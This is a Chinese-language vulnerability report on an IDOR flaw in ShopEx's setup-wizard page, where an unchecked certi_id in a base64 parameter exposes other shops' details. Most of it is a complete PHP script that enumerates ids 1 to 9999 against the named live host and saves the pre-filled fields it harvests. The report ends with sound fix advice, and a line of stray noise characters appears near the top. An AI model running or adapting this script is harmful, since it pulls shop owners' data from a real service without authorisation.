简要描述:
ShopEx 网店使用向导接口存在越权(IDOR)缺陷:refer 参数中的 certi_id 未做归属校验,修改该值即可遍历所有使用 ShopEx 程序的网站。
" m+ f% @5 j/ s, G/ J" Z9 {0 D详细说明:
% f @3 l: o8 l问题出现在shopex 网店使用向导页面
示例请求(URL 中间部分已被截断,仅保留 refer 尾部):
http://guide.ecos.shopex.cn/step2.php?refer=...WlkaWFuLmNvbVwvIn0=
refer 参数 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

服务端仅凭 certi_id 定位店铺,并不校验请求者是否拥有该 ID(base64 只是编码,不提供任何完整性或授权保护),因此修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站;命中时页面会把 refer 原样回显,并在 <input type="text"> 中预填相关信息,下面的脚本据此提取各输入框的 name/value。
<?php
// Sweep certi_id values 1..9999 through the ShopEx setup-wizard endpoint.
// Each id that resolves is echoed to stdout and appended to the output file
// by ShowshopExD(), which is defined further down in this file (PHP resolves
// unconditional top-level function definitions before the script runs, so the
// forward call works). The upper bound is the author's guess at the id space,
// not a documented limit. Only run this against systems you are authorised
// to test.
foreach (range(1, 9999) as $certId) {
    ShowshopExD($certId);
}
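/**
 * Probe one ShopEx certificate id through the setup-wizard endpoint and
 * record the text inputs the wizard pre-fills for it.
 *
 * guide.ecos.shopex.cn/step2.php takes a base64-encoded JSON document in its
 * `refer` query parameter ({"certi_id":N,"callback_url":"..."}). As the
 * disclosure describes, the wizard resolves the shop from `certi_id` without
 * checking that the caller owns that id, so any integer can be substituted
 * (an IDOR; base64 is encoding, not integrity or authorisation). When the id
 * resolves the page echoes `refer` back and pre-fills its
 * `<input type="text">` fields; this function extracts those name/value
 * pairs, echoes them and appends them to $outFile as `name:value` lines
 * followed by a separator line.
 *
 * Requires the curl and mbstring extensions. Only run this against systems
 * you are authorised to test.
 *
 * @param int|string $cid     certificate id to probe; coerced with intval()
 *                            exactly as the original did
 * @param string     $outFile file the name:value pairs are appended to
 * @return bool true when the id resolved (refer was echoed back), false on a
 *              transport failure or an unknown id
 */
function ShowshopExD($cid, $outFile = 'c:/shopEx.txt')
{
    $endpoint = 'http://guide.ecos.shopex.cn/step2.php';
    // Same document shape the wizard expects; callback_url is a dummy value.
    $refer = base64_encode(
        '{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}'
    );

    $html = shopex_fetch($endpoint . '?refer=' . $refer);
    if ($html === false) {
        // Transport failure. The original fed `false` into
        // mb_convert_encoding() and silently treated it as "no hit".
        flush();
        return false;
    }

    // The wizard echoes refer back only for a resolvable certi_id. refer is
    // plain ASCII, so the check works on the raw body; compare against false
    // explicitly because strpos() returns 0 (falsy) for a match at offset 0,
    // which the original's bare truthiness test would have dropped.
    if (strpos($html, $refer) === false) {
        flush();
        return false;
    }

    $fp = fopen($outFile, 'ab');
    if ($fp === false) {
        // Keep printing hits even when the log file cannot be opened.
        error_log('ShowshopExD: cannot open ' . $outFile . ' for append');
    }

    foreach (shopex_text_inputs($html) as $pair) {
        list($name, $value) = $pair;
        // The original re-encoded its output to gb2312, presumably for a GBK
        // Windows console -- kept as-is; confirm before changing.
        $line = mb_convert_encoding($name . ':' . $value . "\r\n", 'gb2312', 'UTF-8');
        echo $line;
        if ($fp !== false) {
            fwrite($fp, $line);
        }
    }
    echo '--------------------------------' . "\r\n";

    if ($fp !== false) {
        fclose($fp);
    }
    flush();
    return true;
}

/**
 * GET $url with the curl options the original used and return the body, or
 * false on a transport failure.
 *
 * Adds connect/total timeouts so a single unresponsive id cannot stall the
 * whole sweep; the original set none.
 *
 * @param string $url
 * @return string|false
 */
function shopex_fetch($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

/**
 * Pull name/value pairs out of the self-closing text inputs in an HTML page.
 *
 * Uses the original's two regexes unchanged: only `<input type="text" ... />`
 * tags are considered, and within each tag a `name="..."` followed later by
 * `value="..."` is required. Tags lacking either attribute are skipped (the
 * original indexed $res[1][0]/$res[3][0] unconditionally and emitted
 * undefined-offset notices for them).
 *
 * @param string $html raw page body
 * @return array list of array($name, $value) in document order; duplicate
 *               names are kept
 */
function shopex_text_inputs($html)
{
    $pairs = array();
    if (!preg_match_all('/<input\stype="text"(.*?)\/>/', $html, $tags)) {
        return $pairs;
    }
    foreach ($tags[1] as $attrs) {
        if (preg_match('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $m)) {
            $pairs[] = array($m[1], $m[3]);
        }
    }
    return $pairs;
}
?>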
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议:仅把 refer 换成其他加密方式治标不治本——问题不在编码或加密强度,而在服务端未校验 certi_id 的归属。应在服务端校验当前会话对该 certi_id 的所有权(若必须经 URL 传递,则对 refer 加 HMAC 签名并设置时效,使其无法被篡改或重放),并对该接口做速率限制以阻止枚举。